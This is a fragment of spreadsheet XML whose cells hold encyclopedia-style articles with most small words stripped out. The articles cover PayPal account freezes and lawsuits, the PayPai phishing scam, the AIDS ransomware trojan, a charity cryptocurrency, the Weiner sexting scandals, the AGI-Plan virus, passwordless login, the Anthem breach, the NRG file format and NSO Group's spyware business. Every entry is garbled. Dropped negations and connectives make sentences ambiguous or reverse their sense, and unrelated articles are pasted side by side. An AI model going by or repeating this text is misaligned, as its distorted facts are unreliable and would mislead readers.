gambling websites online customers. time cessation, largest payment processor online gambling transactions. 2010, paypal resumed accepting transactions, countries online gambling legal, sites properly licensed operate said jurisdictions.since least 2005, paypal maintained acceptable policy disallows "transactions involving items considered obscene [or] certain sexually oriented materials services." their enforcement policy constant source controversy paypal people within related industry. 2014, paypal notified subscription service provider patreon moving cease integration patreon platform result patreon permitting "adult content" platform. patreon subsequently removed access paypal services creators produced sexual content.if account subject fraud unauthorized use, paypal puts "limited access" designation account. paypal several notable cases company frozen account users richard kyanka, owner website something awful, september 2005, cryptome march 2010, april winchell, owner regretsy, december 2011. account reinstated, paypal apologized donated cause.in september 2010, paypal froze account minecraft developer, markus persson. persson stated publicly received clear explanation account frozen, paypal threatening keep money found anything wrong. account contained around €600,000.paypal's partner mastercard ceased taking donations wikileaks 2010, paypal also suspended, later permanently restricted, payments website u.s. state department said wikileaks engaged illegal activities. online supporters activists retaliated subjecting paypal mastercard, along companies, coordinated cyber attacks.in february 2011, paypal unbanned account website supports iraq resisters enough information fulfill know customer guidelines. chelsea manning support network claimed backdown reaction petition company reinstate account.in 2013, paypal declined reward offered bounty program 17-year-old german student reported cross-site scripting flaw site. company wrote vulnerability previously reported, chastised youth disclosing issue public, but, uniquely, sent "letter recognition" discovery.in august 2013, entrepreneurs used paypal collect funds raised crowdfunding platforms like kickstarter indiegogo reported difficulty able withdraw money. victims included ouya, glassup rival google glass), mailpile.in 2014, paypal blocked account russian human rights organisation "rosuznik", supported political prisoners arrested bolotnaya square.as january 2015, class-action lawsuit paypal filed israel, claiming arbitrarily froze accounts held funds days without paying interest thereby directly profited examples given lawsuit, paypal received complaints small vendors later resolved, paypal account closed. lawsuit requests paypal declared monopoly thus regulated accordingly. april 2015, guardian reported paypal blocked account london-based human rights group justice iran.in 2015, paypal blocked account intended raise money distribution boris nemtsov's report "putin. war". explanation paypal "paypal offer opportunity system collecting funds finance activities political parties political aims russia", though paypal's acceptable policy mention financing political goals. non-governmental organization freedom house issued statement "paypal immediately lift ban, help, rather hinder, press freedom russia."by 2016, consumeraffairs received 1,200 consumer reviews paypal, resulting overall satisfaction rating star five company. consumers also launched numerous anti-paypal facebook pages twitter accounts complaints.in february 2017, paypal froze account news media canada, canadian trade association, response payment reminder, flin flon, manitoba community newspaper, intended cover reminder's submission articles consideration nationwide journalism contest news media canada, including discussing syrian refugees. paypal cited united states regulations reason flagging transaction canadian entities.in september 2018, paypal banned radio host alex jones website infowars, claiming site content hateful discriminatory certain religious groups.paypal discontinued payments pornhub models november 2019, alleging "pornhub made certain business payments paypal without seeking permission". pornhub criticized decision affected "over hundred thousand performers rely livelihoods", steered payees toward payment options.in september 2020, paypal issued terms service introduced inactive accounts countries. paypal sent clients e-mail updated terms, mention introducing fee.paypal faced criticism policies related changing name user's account. critics cited complicated system involved changing names, require legal government-issued identification. this system seen impacting transgender users, find trouble using preferred names pronouns.in july 2021, paypal announced plan collaborate anti-defamation league's center extremism, league united latin american citizens, several nonprofits analyze users' transactions order investigate finances extremist hate groups united states share results enforcement, policymakers, financial corporations; adl's ceo, jonathan greenblatt, stated initiative meant help "mitigat[e] extremist threats" "help disrupt activities."in 2022, branko marcetic wrote jacobin magazine paypal cancelled accounts number left-wing media sites frozen funds. paypal gave explanation action, article linked cancellations media sites' criticism policy relation russian invasion ukraine. consortium news, mint press news journalist alan macleod mentioned whose accounts cancelled. marcetic wrote freezing wikileaks' account decade earlier provided precedent paypal's action. litigation march 2002, paypal account holders separately sued company alleged violations electronic funds transfer (efta) california law. most allegations concerned paypal's dispute resolution procedures. lawsuits merged class-action lawsuit paypal litigation). informal settlement reached november 2003, formal settlement signed june 2004. settlement requires paypal change business practices (including changing dispute resolution procedures make efta-compliant), well making us$9.25 million payment members class. paypal denied wrongdoing.in june 2003, stamps.com filed lawsuit paypal ebay claiming breach contract, breach implied covenants good faith fair dealing, interference contract, among claims. 2002 license agreement, stamps.com paypal agreed stamps.com technology would made available allow paypal users print postage online paypal accounts. stamps.com claimed paypal live contractual obligations accused ebay interfering paypal stamps.com's agreement, hence stamp.com's reasoning including ebay suit.craig comb others filed class action paypal craig comb, paypal inc.. they sued, alleging illegal misappropriation customer accounts detailed customer service experiences, including freezing deposited funds days disputes resolved paypal. paypal argued plaintiffs required arbitrate disputes american arbitration association's commercial arbitration rules. court ruled paypal, stating "the user agreement arbitration clause substantively unconscionable california law." paypal agreed $9.25 million result case.in september 2002, bank corporation sued paypal allegedly infringing cardless payment system patents. following year, paypal countersued, claiming bank one's online bill-payment system infringement paypal's online bill-payment patent, issued 1998. companies agreed settlement october 2003.in november 2003, at&amp;t corporation filed suit ebay paypal claiming payment systems infringed at&amp;t patent, filed 1991 granted 1994. case settled court following month, terms settlement undisclosed.in june 2011, paypal israel credit cards-cal</t>
  </si>
  <si>
    <t>PayPaI</t>
  </si>
  <si>
    <t>paypai (capitalised paypai) phishing scam, targets account holders widely used internet payment service, paypal, taking advantage fact capital difficult distinguish lower-case computer fonts. this form homograph attack. scam involves sending paypal account holders notification email claiming paypal "temporarily suspended" account. instead linking paypal.com, site references email link convincing duplicate site paypai.com, hope user enter paypal login details, owner paypai.com store use. history paypai first active mid-2000. sent account holders paypal bogus payment receipt notifications, mimicking sent paypal, indicating account holder received large payment directed recipients paypai.com link message.the site, paypai.com, exact replica html source code images paypal uses home page. while devious, difficult, since html images downloaded display whenever user visits website. site registered network solutions "birykov" south ural, russia.at time, sans serif, font similar arial rendered capital lowercase almost identically, default font address windows applications. when windows released 2001, tahoma became default; tahoma places serifs capital easily distinguish lowercase "l". paypai scams resurfaced 2011, 2012, 2017, 2020. also homograph attack references</t>
  </si>
  <si>
    <t>AIDS (Trojan horse)</t>
  </si>
  <si>
    <t>aids, also known aids info disk cyborg trojan, trojan horse replaces autoexec.bat file, would used aids count number times computer booted. once boot count reaches aids hides directories encrypts names files drive (rendering system unusable), time user asked 'renew license' contact cyborg corporation payment (which would involve sending us$189 post office panama). there exists version aids, least version wait mung drive hide directories encrypt file names upon first boot aids installed. aids software also presented user user license agreement, read: install [this] microcomputer... terms license agree cyborg corporation full cost leasing programs... case breach license agreement, cyborg reserves right take legal action necessary recover outstanding debts payable cyborg corporation program mechanisms ensure termination use... these program mechanisms adversely affect program applications... hereby advised serious consequences failure abide terms license agreement; conscience haunt rest life... [pc] stop functioning normally... strictly prohibited sharing [this product] others...aids considered early example class malware known "ransomware". history aids introduced systems floppy disk called "aids information introductory diskette", mailed mailing list. harvard-taught evolutionary biologist joseph popp, identified author aids trojan horse subscriber list. popp eventually discovered british anti-virus industry named scotland yard arrest warrant. detained brixton prison. though charged eleven counts blackmail clearly tied aids trojan, popp defended saying money going cyborg corporation aids research. harvard-trained anthropologist, popp actually collaborator flying doctors, branch african medical research foundation (amref), consultant kenya, organized conference global aids program year. popp behaving erratically since arrest routine baggage inspection amsterdam schiphol airport. declared mentally unfit stand trial returned united states.jim bates analyzed aids trojan detail published findings virus bulletin. wrote aids trojan alter contents user's files, file names. explained extension filename encryption tables known, restoration possible. aidsout reliable removal program trojan clearaid program recovered encrypted plaintext trojan triggered. clearaid automatically reversed encryption without contact extortionist. aids trojan analyzed even years later. young yung pointed fatal weakness malware aids trojan, namely, reliance symmetric cryptography. they showed public cryptography implement secure information extortion attack. they published discovery (and expanded upon 1996 ieee security privacy paper. cryptovirus, cryptotrojan, cryptoworm hybrid encrypts victim's files using public author victim must (with money, information, etc.) obtain needed session key. this many attacks, overt covert, field known cryptovirology. references external links early analysis trojan computer incident advisory capability, ciac, aids infection distribution original anti-piracy hack, george smith, interesting aids eula computer viruses (a), probert encyclopedia aids information trojan, aids trojan,</t>
  </si>
  <si>
    <t>Pawthereum</t>
  </si>
  <si>
    <t>pawthereum (ticker: pawth) decentralized, animal welfare–focused cryptocurrency created october 2021, running ethereum network. percentage every transaction goes charity wallet, additional percentage goes back token holders form reflections. history pawthereum foundation (also known stichting pawthereum) formed netherlands. pawthereum fork another meme coin, grumpy, based grumpy cat. march 2021, grumpy coin project donated $70,000 crypto funds sterling animal shelter. grumpy converted pawthereum lawsuit owners grumpy cat. notable donations notable donations include eth, valued around $120,000 time, edinburgh home. another $50,000 four paws usa, done matching donation giving tuesday (november 2021). project made donation valued $50,000 catherine violet hubbard animal sanctuary.as july 2022, pawthereum partners raised $576,200 animal welfare–focused charities, $478,700 donated directly pawthereum team. endorsement kevin o'leary canadian businessman entrepreneur kevin o'leary repeatedly endorsed project, praising pawtherem's utility charitable giving goes beyond simply meme coin. references</t>
  </si>
  <si>
    <t>Anthony Weiner sexting scandals</t>
  </si>
  <si>
    <t>anthony weiner former member united states house representatives york city involved multiple scandals related sexting. first scandal began weiner democratic u.s. congressman. used social media website twitter send link contained sexually suggestive picture 21-year-old woman. after initially denying reports posted image, admitted sent link photo, described pittsburgh post-gazette "erection barely covered man's underwear" ipolitics "man-bulge boxer briefs". also sent additional sexually explicit photos messages women marriage. denied ever physical relationship women. june 2011, weiner announced intention resign congress effective june weiner returned politics april 2013 entered york city mayoral race. after additional pictures weiner released, weiner admitted sexting least three women since resignation congress. remained race end, placing fifth democratic primary. following report daily mail september 2016, investigated weiner sexting 15-year-old girl. laptop seized emails related hillary clinton email controversy found causing controversy late presidential election. 2017, weiner pled guilty count transferring obscene material minor. wife, huma abedin, filed divorce prior weiner's guilty plea. september, sentenced months federal prison. served sentence federal medical center, devens, ayer, massachusetts. initial media reports weiner's denial 2011, weiner used public twitter account send link photo yfrog. picture erect penis concealed boxer briefs sent 21-year-old female college student seattle, washington, following posts social media website. though link quickly removed weiner's twitter account, screen shots weiner's original message photo captured user identified "dan wolfe" twitter subsequently sent blogger andrew breitbart published biggovernment website following day. described "lewd photograph" "man bulge underwear".on june 2011, weiner gave series interviews denied sending photo suggested someone, perhaps political opponent, hacked accounts published photo. weiner also said could "with certitude" photo him. suggested image might doctored, saying, "maybe start photo mine looks something different maybe another account." u.s. capitol police investigate incident said retained private security firm look matter felt prank, crime. several bloggers accused wolfe breitbart planting photo message part scheme defame weiner.evidence later revealed group self-described conservatives monitoring weiner's communications women least three months. false identities underage girls created unknown parties solicit communication weiner women contacting. bloggers reported tweet made april 17-year-old delaware girl exclaimed, "seriously talking representative weiner york right now! like life real?" early june, news channel, whose reporter "happened cops showed up", reported police went girl's house question parents. police, "made aware alleged contact" weiner girl, also reviewed content computer. weiner confirmed communicated girl, denied sending inappropriate messages. family girl stated contact "not salacious manner inappropriate". police find anything wrong weiner's communications girl. entire incident later dubbed "weinergate". admission june breitbart posted cropped, shirtless picture weiner obtained second woman internet, said weiner sent pictures himself, including least sexually graphic. after information made public, weiner held press conference york apologized, saying, honest myself, family, constituents, friends supporters, media" that, clear, picture sent it." after prompted reporters, specifically apologized andrew breitbart. also said "engaged several inappropriate conversations conducted twitter, facebook, email occasionally phone" exchanged "messages photos explicit nature women last three years". added never physical relationship them. said "deeply ashamed" "terrible judgment actions", called "very dumb".when weiner answered questions, said continuing support wife huma abedin, long-time aide hillary clinton. married abedin july 2010 ceremony officiated bill clinton, said intend resign congressional seat. prior marriage, weiner known "bachelor exploits york's eligible women," detailed 2011 moment profile congressman. following revelations inappropriate communications, reportedly emotional apology former president clinton referred press highly ironic. asked allegation engaged phone woman nevada, weiner neither confirmed denied statement, saying though want impinge privacy women, neither would contradict statements. press conference, weiner admit exchanged reported sexting messages accuser. later events during appearance sirius radio june 2011, breitbart showed hosts opie anthony photograph claimed weiner's nude genitalia. cameras room caught cell phone's display, hosts subsequently leaked photo publishing twitter. breitbart stated photo published without permission, later told radio, "these people admitted surreptitiously illicitly lied process saying even camera place." weiner's spokesperson issued following statement: representative weiner said monday took responsibility actions, sent explicit photos."news media also reported identity weiner's social media contacts, lisa weiss, 40-year-old blackjack dealer vegas, 28-year-old porn actress ginger exchanged sexually oriented messages weiner. june ginger held press conference said requested advice weiner respond media, advised june stayed quiet scandal would down. political constituent reaction afternoon june 2011, house minority leader nancy pelosi called investigation house ethics committee determine "whether official resources used violation house rules occurred". number democratic republican congressmen called weiner's resignation. june republican national committee chairman reince priebus called resign, challenged pelosi suggest same. house majority leader eric cantor said resign, opining: "the last thing need immersed discussion congressman weiner twitter activities." house democrats called resign june included representatives allyson schwartz (pa), mike ross (ar), mike michaud (me), niki tsongas (ma), larry kissell (nc) donnelly (in).on june nancy pelosi, dccc chair steve israel, chair debbie wasserman schultz called weiner's resignation. weiner requested granted short leave absence house obtain professional treatment unspecified nature.two june surveys york city adult residents provided conflicting results. station marist college poll indicated believed weiner remain congress, thought step down, unsure. wabc-tv/surveyusa automated survey found city divided, percent thought resign percent thought stay office. june ny1-marist poll showed registered voters weiner's congressional district wanted stay congress, thought resign, uncertain. poll, said acted unethically, illegally.on june white house spokesman carney said "the president feels... distraction, congressman weiner said himself, behavior inappropriate; dishonesty inappropriate." president barack obama said interview later weiner, would resign. resignation june 2011, weiner announced would resign seat congress. made announcement news conference brooklyn, location announced first campaign york city council 1992.on june weiner formally submitted letter resignation u.s. house representatives, effective midnight june letter resignation read floor house representatives june entered record.in special election held september 2011 fill vacant seat, republican candidate, businessman turner, defeated democratic candidate, state assemblyman david weprin. 2013 mayoral race second scandal april 2013, former congressman announced return politics candidate mayor york city. soon became front runner democratic primary-opponent city council speaker christine quinn.on july 2013, pictures sexting allegedly weiner released website dirty. they allegedly sent alias "carlos danger" 22-year-old woman named weiner contact late 2012, late april 2013, year weiner left congress. woman's identity confirmed. news conference day, wife huma side, weiner responded, said texts photos likely come out, today have." also said would drop mayoral election city york.on july weiner's sexting partner's identity confirmed sydney leathers personal friend. later york times print edition called weiner withdraw mayoral race editorial titled "mr. weiner elusive truth". joint york/the wall street journal/marist institute public opinion poll taken day, weiner's favorability rating dropped points, lost lead primary race councilor quinn, leading percent.on july york daily news reported that, news conference brooklyn day, weiner admitted sexted three women months resignation congress, women involved total, "dozens dozens". weiner's campaign manager danny kedem quit weekend news conference.following primary election september 2013, press reported sydney leathers, young woman center second scandal, attempted enter weiner's campaign party night, without invitation. weiner lost decisively election, finishing fifth place 4.9% vote. criminal conviction divorce august 2016, york post reported weiner engaged sexting another woman, including sending picture july 2015 lying toddler sleeping next him. york times reported next weiner wife intended separate. weiner served contributor ny1, indefinite leave.on september 2016, daily mail published article claiming weiner engaged sexting 15-year-old girl. it's known daily mail learned incident daily mail article girl's father says contact police article used reason nypd begin investigating weiner. devices owned weiner abedin seized part investigation incident. emails pertinent hillary clinton email controversy discovered weiner's laptop, prompting director james comey reopen investigation late 2016 presidential election. hillary clinton cited comey's decision reason lost election donald trump.on january 2017, wall street journal reported federal prosecutors weighing whether bring child pornography charges weiner incident. 2017, york times reported weiner surrendered morning, plea bargain intended plead guilty single charge transferring obscene material minor. abedin reportedly filed divorce prior guilty plea. september 2017, judge denise cote southern district york agreed plea agreement sentence totaling months federal prison, three years supervised release, weiner register offender. weiner reported federal medical center, devens november released prison february 2019, ordered register offender april year. popular culture first scandal used inspiration part plot line season i-ii showtime series homeland, protagonist, hero (played damian lewis), invited congress (and subsequently gets elected) political career "congressman dick johnson" comes sudden sexting pictures publicized. article washington post, noting weiner story broke time script purposes, quotes alex gansa, co-creator homeland: looking lead character could become congressman quick period time. this presented platter."the 2016 documentary weiner covers resignation congress 2013 mayor york city. also list federal political scandals united states list scandals "-gate" suffix references external links video weiner's june 2011 press conference (cbs news), transcript, york post, june 2011.</t>
  </si>
  <si>
    <t>AGI-Plan</t>
  </si>
  <si>
    <t>agi-plan memory resident file infector first isolated agiplan software company germany. because caro standards dictate viruses named companies, agi-plan's technical name month 4–6. this name also violates caro standards, minor rule involving syntax. agi-plan related zero virus, agi-plan prepend 1,536 bytes files infect. agi-plan initially damaging several months initial infection, hence name. after activation, agi-plan begin corrupt write operations, results slow, difficult-to-notice damage time.agi-plan notable reappearing south africa appeared intentional re-release several years after. agi-plan never succeeded spreading significantly beyond isolated incidents germany south africa. references external links month 4-6, f-secure</t>
  </si>
  <si>
    <t>Passwordless authentication</t>
  </si>
  <si>
    <t>passwordless authentication authentication method user computer system without entering (and remember) password knowledge-based secret. common implementations users asked enter public identifier (username, phone number, email address etc.) complete authentication process providing secure proof identity registered device token. passwordless authentication methods typically rely public-key cryptography infrastructure public provided registration authenticating service (remote server, application website) private kept user’s device (pc, smartphone external security token) accessed providing biometric signature another authentication factor knowledge-based. these factors classically fall categories: ownership factors (“something user has”) cellular phone, token, smart card hardware token. inherence factors (“something user is”) like fingerprints, retinal scans, face voice recognition biometric identifiers.some designs might also accept combination factors geo-location, network address, behavioral patterns gestures, long memorized passwords involved. passwordless authentication sometimes confused multi-factor authentication (mfa), since wide variety authentication factors, often used added layer security password-based authentication, passwordless authentication require memorized secret usually uses highly secure factor authenticate identity, making faster simpler users. "passwordless mfa" term used approaches employed authentication flow passwordless uses multiple factors, providing highest security level implemented correctly. history notion passwords become obsolete circling computer science since least 2004. bill gates, speaking 2004 conference predicted demise passwords saying "they meet challenge anything really want secure." 2011 predicted that, within five years, "you never need password again." matt honan, journalist wired, victim hacking incident, 2012 wrote "the password come end." heather adkins, manager information security google, 2013 said "passwords done google." eric grosse, security engineering google, states "passwords simple bearer tokens, cookies, longer sufficient keep users safe." christopher mims, writing wall street journal said password finally dying" predicted replacement device-based authentication, however, purposefully revealing twitter password resulted forced change cellphone number. avivah litan gartner said 2014 "passwords dead years ago. dead." reasons given often include reference usability well security problems passwords. bonneau systematically compared passwords competing authentication schemes terms usability, deployability, security. (the technical report extended version peer-reviewed paper name.) their analysis shows schemes better passwords security, schemes better worse respect usability, every scheme worse passwords deployability. authors conclude following observation: “marginal gains often sufficient reach activation energy necessary overcome significant transition costs, provide best explanation likely live considerably longer seeing funeral procession passwords arrive cemetery.” recent technological advancements (e.g. proliferation biometric devices smartphones) changing business culture (acceptance biometrics decentralized workforce example) continuously promoting adoption passwordless authentication. leading tech companies (microsoft, google) industry wide initiatives developing better architectures practices bring wider use, many taking cautious approach, keeping passwords behind scenes cases. development open standards fido2 webauthn generated adoption passwordless technologies windows hello. june 2020, apple safari announced face touch would available webauthn platform authenticator passwordless login. mechanism user must first register system identity verified. passwordless registration flow include following steps: registration request: when user attempts register website, server sends registration request user's device. authentication factor selection: when user's device receives registration request, sets method authenticating user. example, device biometrics like fingerprint scanner facial recognition user identification. generation: user's device generates public/private pair sends public server future verification.once registered, user system following process: authentication challenge: server sends authentication user's device user attempts site. user authentication: user proves identity device using biometric scanner, unlocking private key. challenge response: user's device digitally signs response authentication challenge user's private key. response validation: server uses device's public verify digital signature provides access user's account. benefits drawbacks proponents point several unique benefits authentication methods: greater security passwords known weak point computer systems (due reuse, sharing, cracking, spraying etc.) regarded attack vector responsible huge percentage security breaches. better user experience users aren’t required remember complicated password comply different security policies, also required periodically renew passwords. reduced costs since password storage management needed teams longer burdened setting password policies, detecting leaks, resetting forgotten passwords, complying password storage regulation. better visibility credential since credentials tied specific device inherent user attribute, can't massively used access management becomes tight. scalability managing multiple logins without additional password fatigue complicated registration.while others point operational cost-related disadvantages: implementation costs although accepted passwordless authentication leads savings long term, deployment costs currently hindering factor many potential users. cost associated need deploy authentication mechanism existing user directory sometimes additional hardware deployed users (e.g. otps security keys). training expertise needed password management systems built similarly used many years, passwordless authentication requires adaptation teams users. single point failure particularly implementations using push notifications cellular device applications create challenge user device broken, lost, stolen simply upgraded. also references external links "true passwordless mfa" hypr corporation passwordless authentication secret double octopus</t>
  </si>
  <si>
    <t>Anthem medical data breach</t>
  </si>
  <si>
    <t>anthem medical data breach medical data breach information held elevance health, known time anthem inc. february 2015, anthem, inc. disclosed criminal hackers broken servers potentially stolen 37.5 million records contain personally identifiable information servers. february 2015 anthem raised number 78.8 million people whose personal information affected. according anthem, inc., data breach extended multiple brands anthem, inc. uses market healthcare plans, including, anthem blue cross, anthem blue cross blue shield, blue cross blue shield georgia, empire blue cross blue shield, amerigroup, caremore, unicare. healthlink says also victim. anthem says users' medical information financial data compromised. anthem offered free credit monitoring wake breach. michael daniel, chief adviser cybersecurity president barack obama, said would changing password. according york times, million company records hacked, fear stolen data used identity theft. compromised information contained names, birthdays, medical ids, social security numbers, street addresses, e-mail addresses employment information, including income data. theft data data stolen period weeks month data breach discovered.anthem required encrypt data. however, anthem faced several civil class-action lawsuits, settled 2017 cost $115 million. anthem admit wrongdoing settlement.data attack expected sold black market. impact persons whose data stolen could resulting problems identity theft rest lives. anthem us$100 million insurance policy cyber problems american international group. report suggested money could consumed process notifying customers breach. responses anthem hired mandiant, cybersecurity firm, review security systems advised people whose data stolen monitor accounts remain vigilant.the theft data raised fears generally theft medical information. writer harvard school suggested data breach might spark reform security practices government data safety regulation.an investigation conducted several state insurance commissioners blames breach attacker whose identity withheld, claims breach likely ordered foreign government whose name withheld. also concluded anthem taken reasonable measures protect data breach remediation plan effective shutting breach discovered. also marks starting date breach february 2014. lead investigator indiana department insurance (doi) anthem's principal regulator, anthem headquartered indiana. indiana hired independent auditors conduct security assessment anthem, concluded, "while deficiencies within anthem’s cybersecurity posture noted examination team, deficiencies not, experience, uncommon companies comparable anthem size scope. while pre-breach deficiencies impacted anthem’s ability reduce likelihood quickly detect data breach, controls implemented subsequent data breach improve anthem’s ability detect future breaches enable anthem respond effectively future attack case instance."federal regulators also conducted investigation anthem data breach, resulting million settlement anthem department health human services (hhs) largest data breach settlement. director overseeing investigation said, "the largest health data breach u.s. history fully merits largest hipaa settlement history. unfortunately, anthem failed implement appropriate measures detecting hackers gained access system harvest passwords steal people's private information." settlement also required anthem perform risk assessment correct identified deficiencies cybersecurity, oversight anthem's progress.approximately private class action lawsuits filed anthem data breach consolidated california federal court, front judge koh, respected authority data breach litigation. after contested briefing lead litigation efforts, judge appoints cervantez altshuler berzon andy friedman cohen milstein co-lead counsel, appointed eric gibbs gibbs group michael sobel lieff cabraser head plaintiffs' steering committee. 2017, anthem agreed settle litigation $115 million, largest ever data breach settlement time. attorneys requested million fees work case, judge slashed request, finding million fees merited. references external links anthemfacts, anthem's website supporting customers whose data breached data breach litigation, class action settlement</t>
  </si>
  <si>
    <t>NRG (file format)</t>
  </si>
  <si>
    <t>file proprietary optical disc image file format originally created nero nero burning utility.[1] used store disc images. other nero burning rom, however, variety software titles image files. example, alcohol 120%, daemon tools mount files onto virtual drives reading. contrary popular belief, files images .nrg extension header attached. they store audio tracks audio cds, images cannot. nero's format formats besides bin/cue, alcohol 120%'s mdf/mds clonecd's ccd/img/sub disc image formats support mixed mode contain audio tracks well data tracks. file format file format specification unofficial lacking data. there also errors. file format uses variation interchange file format (iff) stores data chain "chunks". integer values stored unsigned endian byte order. version format stores values 32-bit integers. nero burning v5.5 introduced file format, version support 64-bit integers. header format store data header beginning file. instead attached file like footer. image information stored serialized chain chunks. offset first chunk must read footer last bytes file. chunks (cues) sheet available versions file format. cuex chunk concatenation fixed-size blocks, representing point. index0 points present even identical index1 ones. index0 points audio tracks incorrect nero asked record sub-channel data case sector size 2448 bytes). index encountered, although chunk format allows points recorded; thus number blocks seems always 2*(#track indices track, index0 lead-in index1 lead-out. (daoi) information available versions file format. daoi chunks store disc sessions specific information parts. first part contains data specific session only. second part repeats track specific information (grey) track. parse sinf chunks number tracks specific session. (cdtx) cd-text available version file format. cdtx chunk concatenation cd-text packs bytes each. (etnf) extended track information available versions file format. etnf chunks used store track information track sessions. data repeated track. parse sinf chunks number tracks specific session. (sinf) session information available versions file format. session information chunks used quickly scan image session track count. sinf chunks always listed sequential order corresponding sessions order. details information specific session must parse corresponding daoi etnf chunk. (mtyp) media type? available versions file format. this chunk unknown. value (big endian) found images several (audio data; cd-rom cd-r). (dinf) disc information? found images version file format. found images version file format nero asked close disc. this chunk unknown. (toct) found images version file format. this chunk unknown. (relo) found images version file format. this chunk unknown. (end!) chain available versions file format. chain chunk signals chunks read.</t>
  </si>
  <si>
    <t>NSO Group</t>
  </si>
  <si>
    <t>group technologies (nso standing niv, shalev omri, names company's founders) israeli technology firm primarily known proprietary spyware pegasus, capable remote zero-click surveillance smartphones. founded 2010 karmi, omri lavie, shalev hulio. based herzliya, near aviv, israel. employed almost people 2017.nso deals government clients only. claims provides authorized governments technology helps combat terror crime. pegasus spyware classified weapon israel export technology must approved government.according several reports, group spyware used target human rights activists journalists various countries, used state espionage pakistan, warrantless domestic surveillance israeli citizens israeli police, played role murder saudi dissident jamal khashoggi agents saudi government.in 2019, instant messaging company whatsapp parent company meta platforms (then known facebook) sued united states computer fraud abuse (cfaa). 2021, apple filed lawsuit u.s., included group entity list acting u.s. national security foreign policy interests, effectively banning u.s. companies supplying nso. corporate profile overview group subsidiary cyber technologies group companies. cyber technologies name group uses israel, company goes technologies luxembourg, north america, subsidiary formerly known westbridge. operated various companies around world. founding group founded 2010 karmi, omri lavie, shalev hulio. hulio lavie school friends went technology start-up sector mid-2000s. pair founded company communitake offered tool cellphone tech support workers access customers' devices (but necessitating customer grant permission enable access). after european intelligence agency expressed interest product, pair realised could instead develop tool could gain access phones without user authorisation, market security intelligence agencies. karmi, served military intelligence mossad, brought board help market tool help contacts. first iteration nso's pegasus spyware finalised 2011. operations group come employ personnel globally. almost nso's research team made former israeli military intelligence personnel, served israel's military intelligence directorate, many unit 8200. company's valuable staff graduates military intelligence's highly selective advanced cyberweapons training programs. seeks uncover surfeit zero-day exploits target devices ensure smooth continuous access even security vulnerabilities exploited inevitably discovered patched, labs company's herzliya headquarters featuring racks stacked phones tested exploits. relationship israeli state pegasus spyware classified military export israel sale controlled government. according york times, "israel’s government long seen pegasus critical tool foreign policy." "[...] treated facto state, granting licenses pegasus numerous countries [...] israeli government hoped nurture stronger security diplomatic ties." israel used sale products diplomatic bargaining chip advance foreign policy interests well limiting sale certain states maintain good relations certain states. israel faced criticism approving sale technologies countries poor human rights records. u.s. intelligence officials also said israeli state presumably backdoor access data obtained pegasus. denies tool israeli diplomacy", denies presence backdoor spyware tools.israel, wary angering u.s. wake snowden revelations, required prevent pegasus targeting american phone numbers. israel used pegasus advance interests region, pegasus playing role negotiating abraham accords. york times investigation highlighted several instances sale pegasus particular government coincided government's increased support israel. israeli government also blocked sale pegasus estonia ukraine fear israel's relations russia would damaged spyware used russia. after senior russian official approached israeli security agencies informed russia learned estonia's attempts obtain pegasus, israeli ministry defense decided disallow estonia using pegasus russian phone numbers following heated debate issue among israeli officials. corporate history company's start-up funding came group investors headed eddy shalev, partner venture capital fund genesis partners invested total $1.8 million stake.in 2013, nso's annual revenues around us$40 million.in 2014, u.s.-based private equity firm francisco partners bought company $130 million.in 2014, surveillance firm circles (which produces phone geolocation tool) acquired francisco parterns $130 million, thus became corporate affiliate nso's.in 2015 francisco seeking sell company billion.annual revenues around $150 million 2015.in june 2017, company sale billion francisco partners (roughly times francisco originally paid acquire 2014). time sale, almost employees around 2014).on february 2019, francisco partners sold majority (60%) stake back co-founders shalev hulio omri lavie, supported purchase european private equity fund novalpina capital. hulio lavie invested $100 million, novalpina acquiring remaining portion majority stake, thus valuing company approximately billion. acquisition, novalpina attempted address concerns raised citizen letter, stating belief operates sufficient integrity caution.in july 2021, investors novalpina capital stripped novalpina capital control assets (including nso) unresolved personal dispute amongst co-founders novalpina capital. berkeley research group (brg), california-based consultancy firm, subsequently handed control assets (including nso).by time brg's takeover, group perilous financial straits, gone months without sale risk missing debt payments november 2021 payroll payments. shalev hulio suggested company improve financial standing starting sell products high-risk customers previously deemed unacceptable, responding objections joking missing debt payments risky too. categorically opposed suggestion despite acknowledging selling high-risk customers realistic maintaining nso's business operations. hulio proposed increasing sales israel's western allies (including u.s. enforcement, lucrative prospective market), november 2021 u.s. blacklisting subsequently ended company's prospects breaking u.s. market (hulio devised plan split company order circumvent u.s. sanctions). according financial times, also seemed abandoned previously doting israeli government proliferation israeli companies offering comparable technologies (including established former employees). court filing, described "valueless" private equity backers; december 2022, group creditors described insolvent letter nso's majority shareholders.two ousted co-founders attempted reclaim control novalpina capital's assets filing lawsuit luxemburg, u.k. court allowing case proceed trial april 2022. april 2022 letter, told committee investigating abuse nso's products nso's management forthcoming providing information business operations, including issue company's blacklisting u.s.in months november 2021 blacklisting u.s. department commerce resulted u.s. export company, amid campaign israeli government find prevent floundering going under, u.s. commerce department sent list questions spyware products operate. 2022, l3harris technologies, u.s. military contractor experience spyware technology sector, conducting talks possibility acquiring nso. l3harris sought acquire nso's technology code acquisition company's employees discussed well. l3harris executives travelled israel conduct talks disclosed public. l3harris reportedly told counterparts blessing backing u.s. government u.s. intelligence pursuing acquisition long pegasus source code cache zero-day vulnerabilities uncovered could passed intelligence agencies five eyes. israeli authorities reportedly willing fulfill latter reluctant comply former, also insisted israel ultimately retain control issuing export licences nso's products. israeli authorities also opposed allowing l3harris' employees joining nso's development team nso's israeli headquarters. talks revealed public press june 2022, resulting scramble parties involved, white house officials publicly condeming negotiation harsh terms, l3harris (which heavily reliant government contracts) reportedly notified u.s. government abandoned acquisition attempt. there reportedly attempts revive negotiations weeks became known public. acquisition u.s.-based corporation lifted blacklisting u.s. barred receiving exports u.s. companies, hindering nso's operations. experts consulted guardian said blacklisting group, corporate entity would likely created u.s. government would allow acquisition. senior white house official commented anonymously article made secret acquisition negotiations public, stating white house involved deal, stating u.s. government "opposes efforts foreign companies circumvent export control measures sanctions [...]". foreign offices export controls late 2020, vice media published article reported group closed cyprus-based offices circles, company acquired 2014. article, based interviews former employees, described integration companies "awful" stated would rely circles' bulgarian office instead. according vice, came year activist group known access wrote authorities cyprus bulgaria, asking scrutinise exports. access stated received denials bulgarian cypriot authorities, countries stating provided export licenses group. despite this, article written guardian 2021 pegasus scandal quoted group saying "regulated export control regimes israel, cyprus bulgaria". nso's "transparency responsibility report 2021", published month scandal, makes statement, adding three countries exported products. circles' bulgarian office, particular, stated founded "bogus phone company" 2015 citizen citing intelligenceonline, part indigo publications. this report reprinted bulgarian investigation publication bivol december 